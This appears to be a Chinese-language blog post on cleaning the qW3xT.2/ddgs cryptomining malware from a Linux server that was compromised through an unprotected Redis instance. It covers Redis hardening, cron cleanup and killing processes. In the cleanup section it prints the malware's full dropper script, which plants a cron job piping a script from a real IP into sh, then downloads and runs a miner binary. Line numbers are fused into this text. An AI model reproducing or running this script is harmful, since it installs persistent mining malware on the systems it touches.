# 清除挖矿病毒 qW3xT.2
# 原因
服务器上装有redis,开放了6379端口,但是由于没有设置redis密码或者密码过于简单如123456,病毒从此入口植入。
查看服务器的top发现该进程qW3xT.2大量占用CPU使用率
# 解决步骤
# 更改redis端口、密码,然后重启redis
redis的密码不宜过于简单,把默认端口6379改为其他。
redis.conf 的 port 和 requirepass
# 清除无赖挖矿计划任务
查看计划任务创建的文件
curl -fsSL http://149.56.106.215:8000/i.sh1export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013 if [ ! -f "/tmp/ddgs.3013" ]; then curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013 fi chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24发现计划任务在服务器中创建了几个文件
/var/spool/cron/crontabs/root /var/spool/cron/root1
2直接删除创建的该文件
rm /var/spool/cron/root rm /var/spool/cron/crontabs/root1
2查看计划任务
crontab -l1出现下列信息
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh1直接删除计划任务
crontab -r1删除该挖矿病毒
在/tmp目录下发现qW3xT.2和ddgs.3013文件
直接删除这两个文件
杀掉该挖矿进程
top //发现top中存在qW3xT.2和ddgs.3013的进程,根据PID直接kill -9 删除1